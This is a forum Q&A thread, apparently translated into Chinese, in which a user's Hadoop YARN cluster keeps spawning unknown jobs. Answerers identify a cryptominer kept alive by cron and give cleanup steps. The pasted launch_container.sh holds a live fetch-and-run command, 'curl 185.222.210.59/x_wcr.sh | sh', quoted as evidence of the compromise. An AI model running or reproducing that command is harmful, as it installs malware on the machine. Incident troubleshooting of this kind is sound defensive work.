2

每次启动纱线时,我都会发现一个无法完成的任务请求,但我无法获得任何有关它的日志,也没有发现任何错误。我在名为launch_container.sh的临时目录中找到了一个文件,如下所示:

enter code here#!/bin/bash


export NM_HTTP_PORT="8042"

export LOCAL_DIRS="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001"

export HADOOP_COMMON_HOME="/root/hadoop-2.8.3"

export JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.el7_5.x86_64/jre"

export NM_AUX_SERVICE_mapreduce_shuffle="AAA0+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

"

export HADOOP_YARN_HOME="/root/hadoop-2.8.3"

export HADOOP_TOKEN_FILE_LOCATION="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001/container_tokens"

export NM_HOST="VM_0_11_centos"

export APPLICATION_WEB_PROXY_BASE="/proxy/application_1527211944644_0001"

export JVM_PID="$$"

export USER="dr.who"

export HADOOP_HDFS_HOME="/root/hadoop-2.8.3"

export PWD="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001"

export CONTAINER_ID="container_1527211944644_0001_02_000001"

export HOME="/home/"

export NM_PORT="44381"

export LOGNAME="dr.who"

export APP_SUBMIT_TIME_ENV="1527212057989"

export MAX_APP_ATTEMPTS="2"

export HADOOP_CONF_DIR="/root/hadoop-2.8.3/etc/hadoop"

export MALLOC_ARENA_MAX="4"

export LOG_DIRS="/root/hadoop-2.8.3/logs/userlogs/application_1527211944644_0001/container_1527211944644_0001_02_000001"

exec /bin/bash -c "curl 185.222.210.59/x_wcr.sh | sh"

hadoop_shell_errorcode=$?

if [ $hadoop_shell_errorcode -ne 0 ]

then

  exit $hadoop_shell_errorcode

fi

我发现它会从网站下载一些东西,并且我已经将我的计算机从 ubuntu 重新安装到 centos,但这个问题仍然存在,尽管我在其他计算机上找不到同样的问题。这个问题到底是正常的东西还是木马?请提供一些有关如何解决此问题的提示,谢谢。与本站“ http://ist-deacuna-s1.syr.edu:8088/cluster/apps ”相同

这种情况是我关闭wget的端口后产生的,当我打开wget的端口时,会添加jps看不到的session,只能通过commmand观察

ps -ef|grep java
ubuntu    7484     1 97 07:16 ?        00:01:58 /var/tmp/java -c /var/tmp/w.conf
ubuntu    7496     1 96 07:16 ?        00:01:57 /var/tmp/java -c /var/tmp/w.conf

这两个会话总是占用我所有的 cpu。

4

2 回答 2

3

这是一个黑客......他们在你的机器上放了一个矿工。我有同样的事情,这里是如何摆脱它。他们创建了一个 cron 作业来执行远程 sh 文件,以便在您删除它时“安装”它。那必须先删除。我在

/var/spool/cron

然后您可以删除整个 /var/tmp/ 目录。然后杀死有问题的pid。找到他们

ps -Af | grep /tmp/

我试图弄清楚他们如何能够访问我们的机器来安装它。

于 2018-06-05T18:51:56.323 回答
0

你能用--version检查文件/var/tmp/java吗?有同样的问题。建议你会找到 XMRig

于 2018-05-30T08:16:36.170 回答